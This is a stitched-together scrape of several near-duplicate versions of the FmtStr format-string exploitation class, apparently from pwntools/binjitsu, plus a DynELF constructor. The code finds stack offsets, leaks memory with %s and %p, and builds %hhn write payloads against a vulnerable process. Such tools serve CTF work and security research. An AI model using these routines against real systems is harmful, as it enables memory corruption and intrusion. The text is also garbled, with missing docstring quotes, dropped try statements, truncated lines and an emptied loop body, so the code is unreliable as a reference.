    def __init__(self, execute_fmt, offset=None, padlen=0, numbwritten=0):
        self.execute_fmt = execute_fmt
        self.offset = offset
        self.padlen = padlen
        self.numbwritten = numbwritten

        if self.offset is None:
            self.offset, self.padlen = self.find_offset()
            log.info("Found format string offset: %d", self.offset)

        self.writes = {}
        self.leaker = MemLeak(self._leaker)
    def __init__(self, execute_fmt, offset=None, padlen=0, numbwritten=0):
        Instantiates an object which try to automating exploit the vulnerable process

            execute_fmt(function): function to call for communicate with the vulnerable process
            offset(int): the first formatter's offset you control
            padlen(int): size of the pad you want to add before the payload
            numbwritten(int): number of already written bytes
        self.execute_fmt = execute_fmt
        self.offset = offset
        self.padlen = padlen
        self.numbwritten = numbwritten

        if self.offset is None:
            self.offset, self.padlen = self.find_offset()
            log.info("Found format string offset: %d", self.offset)

        self.writes = {}
        self.leaker = MemLeak(self._leaker)
    def __init__(self, execute_fmt, offset = None, padlen = 0, numbwritten = 0):
        self.execute_fmt = execute_fmt
        self.offset = offset
        self.padlen = padlen
        self.numbwritten = numbwritten

        if self.offset == None:
            self.offset, self.padlen = self.find_offset()
            log.info("Found format string offset: %d", self.offset)

        self.writes = []
        self.leaker = MemLeak(self._leaker)
    def __init__(self, leak, pointer=None, elf=None, libcdb=True):
        Instantiates an object which can resolve symbols in a running binary
        given a :class:`pwnlib.memleak.MemLeak` leaker and a pointer inside
        the binary.

            leak(MemLeak): Instance of pwnlib.memleak.MemLeak for leaking memory
            pointer(int):  A pointer into a loaded ELF file
            elf(str,ELF):  Path to the ELF file on disk, or a loaded :class:`pwnlib.elf.ELF`.
            libcdb(bool):  Attempt to use libcdb to speed up libc lookups
        self.libcdb = libcdb
        self._elfclass = None
        self._elftype = None
        self._link_map = None
        self._waitfor = None
        self._bases = {}
        self._dynamic = None

        if not (pointer or (elf and elf.address)):
                "Must specify either a pointer into a module and/or an ELF file with a valid base address"

        pointer = pointer or elf.address

        if not isinstance(leak, MemLeak):
            leak = MemLeak(leak)

        if not elf:
                "No ELF provided.  Leaking is much faster if you have a copy of the ELF being leaked."

        self.elf = elf
        self.leak = leak
        self.libbase = self._find_base(pointer or elf.address)

        if elf:
    def __init__(self, execute_fmt, offset=None, padlen=0, numbwritten=0):
        Instantiates an object which try to automating exploit the vulnerable process

            execute_fmt(function): function to call for communicate with the vulnerable process
            offset(int): the first formatter's offset you control
            padlen(int): size of the pad you want to add before the payload
            numbwritten(int): number of already written bytes
        self.execute_fmt = execute_fmt
        self.offset = offset
        self.padlen = padlen
        self.numbwritten = numbwritten

        if self.offset == None:
            self.offset, self.padlen = self.find_offset()
            log.info("Found format string offset: %d", self.offset)

        self.writes = {}
        self.leaker = MemLeak(self._leaker)
class FmtStr:
    Provides an automated format string exploitation.

    It takes a function which is called every time the automated
    process want to communicate with the vulnerable process. this
    function takes a parameter with the payload that you have to
    send to the vulnerable process and must return the process

    If the `offset` parameter is not given, then try to find the right
    offset by leaking stack data.

        execute_fmt(function): function to call for communicate with the vulnerable process
        offset(int): the first formatter's offset you control
        padlen(int): size of the pad you want to add before the payload
        numbwritten(int): number of already written bytes

    def __init__(self, execute_fmt, offset=None, padlen=0, numbwritten=0):
        Instantiates an object which try to automating exploit the vulnerable process

            execute_fmt(function): function to call for communicate with the vulnerable process
            offset(int): the first formatter's offset you control
            padlen(int): size of the pad you want to add before the payload
            numbwritten(int): number of already written bytes
        self.execute_fmt = execute_fmt
        self.offset = offset
        self.padlen = padlen
        self.numbwritten = numbwritten

        if self.offset is None:
            self.offset, self.padlen = self.find_offset()
            log.info("Found format string offset: %d", self.offset)

        self.writes = {}
        self.leaker = MemLeak(self._leaker)

    def leak_stack(self, offset, prefix=b''):
        leak = self.execute_fmt(prefix +
            leak = re.findall(b"START(.*)END", leak,
                              re.MULTILINE | re.DOTALL)[0]
            leak = int(leak, 16)
        except ValueError:
            leak = 0
        return leak

    def find_offset(self):
        alphabet = string.ascii_letters.encode('utf8')
        marker = cyclic(20, alphabet)
        for off in range(1, 1000):
            leak = self.leak_stack(off, marker)
            leak = pack(leak)

            pad = cyclic_find(leak, alphabet)
            if pad >= 0 and pad < 20:
                return off, pad
            log.error("Could not find offset to format string on stack")
            return None, None

    def _leaker(self, addr):
        # Hack: elfheaders often start at offset 0 in a page,
        # but we often can't leak addresses containing null bytes,
        # and the page below elfheaders is often not mapped.
        # Thus the solution to this problem is to check if the next 3 bytes are
        # "ELF" and if so we lie and leak "\x7f"
        # unless it is leaked otherwise.
        if addr & 0xfff == 0 and self.leaker._leak(addr + 1, 3,
                                                   False) == b"ELF":
            return b"\x7f"

        fmtstr = randoms(self.padlen, string.ascii_letters.encode('utf8'))
        fmtstr += pack(addr)
        fmtstr += "START%{}$sEND".format(self.offset).encode('utf8')

        leak = self.execute_fmt(fmtstr)
        leak = re.findall(b"START(.*)END", leak, re.MULTILINE | re.DOTALL)[0]
        leak += b"\x00"
        return leak

    def execute_writes(self):
        """execute_writes() -> None

        Makes payload and send it to the vulnerable process

        fmtstr = randoms(self.padlen, string.ascii_letters.encode('utf8'))
        fmtstr += fmtstr_payload(self.offset,
        self.writes = {}

    def write(self, addr, data):
        r"""write(addr, data) -> None

        In order to tell : I want to write ``data`` at ``addr``.

            addr(int): the address where you want to write
            data(int): the data that you want to write ``addr``



            >>> def send_fmt_payload(payload):
            ...     print(repr(payload))
            >>> f = FmtStr(send_fmt_payload, offset=5)
            >>> f.write(0x08040506, 0x1337babe)
            >>> f.execute_writes()
        self.writes[addr] = data
文件: fmtstr.py 项目: thetlk/binjitsu
class FmtStr(object):
    Provides an automated format string exploitation.

    It takes a function which is called every time the automated
    process want to communicate with the vulnerable process. this
    function takes a parameter with the payload that you have to
    send to the vulnerable process and must return the process

    If the `offset` parameter is not given, he try to find the right
    offset by leaking stack datas.

            execute_fmt(function): function to call for communicate with the vulnerable process
            offset(int): the first formatter's offset you control
            padlen(int): size of the pad you want to add before the payload
            numbwritten(int): number of already written bytes


    def __init__(self, execute_fmt, offset = None, padlen = 0, numbwritten = 0):
        Instantiates an object which try to automating exploit the vulnerable process

            execute_fmt(function): function to call for communicate with the vulnerable process
            offset(int): the first formatter's offset you control
            padlen(int): size of the pad you want to add before the payload
            numbwritten(int): number of already written bytes
        self.execute_fmt = execute_fmt
        self.offset = offset
        self.padlen = padlen
        self.numbwritten = numbwritten

        if self.offset == None:
            self.offset, self.padlen = self.find_offset()
            log.info("Found format string offset: %d", self.offset)

        self.writes = {}
        self.leaker = MemLeak(self._leaker)

    def leak_stack(self, offset, prefix=""):
        leak = self.execute_fmt(prefix+"START%{}$pEND".format(offset))
            leak = re.findall(r"START(.*)END", leak, re.MULTILINE | re.DOTALL)[0]
            leak = int(leak, 16)
        except ValueError:
            leak = 0
        return leak

    def find_offset(self):
        marker = cyclic(20)
        for off in range(1,1000):
            leak = self.leak_stack(off, marker)
            leak = pack(leak)

            pad = cyclic_find(leak)
            if pad >= 0 and pad < 20:
                return off, pad
            log.error("Could not find offset to format string on stack")
            return None, None

    def _leaker(self, addr):
        # Hack: elfheaders often start at offset 0 in a page,
        # but we often can't leak addresses containing null bytes,
        # and the page below elfheaders is often not mapped.
        # Thus the solution to this problem is to check if the next 3 bytes are
        # "ELF" and if so we lie and leak "\x7f"
        # unless it is leaked otherwise.
        if addr & 0xfff == 0 and self.leaker._leak(addr+1, 3, False) == "ELF":
            return "\x7f"

        fmtstr = randoms(self.padlen) + pack(addr) + "START%%%d$sEND" % self.offset

        leak = self.execute_fmt(fmtstr)
        leak = re.findall(r"START(.*)END", leak, re.MULTILINE | re.DOTALL)[0]

        leak += "\x00"

        return leak

    def execute_writes(self):
        """execute_writes() -> None

        Makes payload and send it to the vulnerable process


        fmtstr = randoms(self.padlen)
        fmtstr += fmtstr_payload(self.offset, self.writes, numbwritten=self.padlen, write_size='byte')
        self.writes = {}

    def write(self, addr, data):
        r"""write(addr, data) -> None

        In order to tell : I want to write ``data`` at ``addr``.

            addr(int): the address where you want to write
            data(int): the data that you want to write ``addr``



            >>> def send_fmt_payload(payload):
            ...     print repr(payload)
            >>> f = FmtStr(send_fmt_payload, offset=5)
            >>> f.write(0x08040506, 0x1337babe)
            >>> f.execute_writes()

        self.writes[addr] = data
class FmtStr(object):
    def __init__(self, execute_fmt, offset=None, padlen=0, numbwritten=0):
        self.execute_fmt = execute_fmt
        self.offset = offset
        self.padlen = padlen
        self.numbwritten = numbwritten

        if self.offset == None:
            self.offset, self.padlen = self.find_offset()
            log.info("Found format string offset: %d", self.offset)

        self.writes = []
        self.leaker = MemLeak(self._leaker)

    def leak_stack(self, offset, prefix=""):
        leak = self.execute_fmt(prefix + "START%%%d$pEND" % offset)
            leak = re.findall(r"START(.*)END", leak,
                              re.MULTILINE | re.DOTALL)[0]
            leak = int(leak, 16)
        except ValueError:
            leak = 0
        return leak

    def find_offset(self):
        marker = cyclic(20)
        for off in range(1, 1000):
            leak = self.leak_stack(off, marker)
            leak = pack(leak)

            pad = cyclic_find(leak)
            if pad >= 0 and pad < 20:
                return off, pad
            log.error("Could not find offset to format string on stack")
            return None, None

    def _leaker(self, addr):
        # Hack: elfheaders often start at offset 0 in a page,
        # but we often can't leak addresses containing null bytes,
        # and the page below elfheaders is often not mapped.
        # Thus the solution to this problem is to check if the next 3 bytes are
        # "ELF" and if so we lie and leak "\x7f"
        # unless it is leaked otherwise.
        if addr & 0xfff == 0 and self.leaker._leak(addr + 1, 3,
                                                   False) == "ELF":
            return "\x7f"

        fmtstr = randoms(
            self.padlen) + pack(addr) + "START%%%d$sEND" % self.offset

        leak = self.execute_fmt(fmtstr)
        leak = re.findall(r"START(.*)END", leak, re.MULTILINE | re.DOTALL)[0]

        leak += "\x00"

        return leak

    def execute_writes(self):
        addrs = []
        bytes = []

        #convert every write into single-byte writes
        for addr, data in self.writes:
            data = flat(data)
            for off, b in enumerate(data):
                addrs.append(addr + off)

        fmtstr = randoms(self.padlen) + flat(addrs)
        n = self.numbwritten + len(fmtstr)

        for i, b in enumerate(bytes):
            b -= (n % 256)
            if b <= 0:
                b += 256
            fmtstr += "%%%dc%%%d$hhn" % (b, self.offset + i)
            n += b

        self.writes = []

    def write(self, addr, data):
        self.writes.append((addr, data))
class FmtStr(object):
    def __init__(self, execute_fmt, offset = None, padlen = 0, numbwritten = 0):
        self.execute_fmt = execute_fmt
        self.offset = offset
        self.padlen = padlen
        self.numbwritten = numbwritten

        if self.offset == None:
            self.offset, self.padlen = self.find_offset()
            log.info("Found format string offset: %d", self.offset)

        self.writes = []
        self.leaker = MemLeak(self._leaker)

    def leak_stack(self, offset, prefix=""):
        leak = self.execute_fmt(prefix+"START%%%d$pEND" % offset)
            leak = re.findall(r"START(.*)END", leak, re.MULTILINE | re.DOTALL)[0]
            leak = int(leak, 16)
        except ValueError:
            leak = 0
        return leak

    def find_offset(self):
        marker = cyclic(20)
        for off in range(1,1000):
            leak = self.leak_stack(off, marker)
            leak = pack(leak)

            pad = cyclic_find(leak)
            if pad >= 0 and pad < 20:
                return off, pad
            log.error("Could not find offset to format string on stack")
            return None, None

    def _leaker(self, addr):
        # Hack: elfheaders often start at offset 0 in a page,
        # but we often can't leak addresses containing null bytes,
        # and the page below elfheaders is often not mapped.
        # Thus the solution to this problem is to check if the next 3 bytes are
        # "ELF" and if so we lie and leak "\x7f"
        # unless it is leaked otherwise.
        if addr & 0xfff == 0 and self.leaker._leak(addr+1, 3, False) == "ELF":
            return "\x7f"

        fmtstr = randoms(self.padlen) + pack(addr) + "START%%%d$sEND" % self.offset

        leak = self.execute_fmt(fmtstr)
        leak = re.findall(r"START(.*)END", leak, re.MULTILINE | re.DOTALL)[0]

        leak += "\x00"

        return leak

    def execute_writes(self):
        addrs = []
        bytes = []

        #convert every write into single-byte writes
        for addr, data in self.writes:
            data = flat(data)
            for off, b in enumerate(data):

        fmtstr = randoms(self.padlen) + flat(addrs)
        n = self.numbwritten + len(fmtstr)

        for i, b in enumerate(bytes):
            b -= (n % 256)
            if b <= 0:
                b += 256
            fmtstr += "%%%dc%%%d$hhn" % (b, self.offset + i)
            n += b

        self.writes = []

    def write(self, addr, data):
        self.writes.append((addr, data))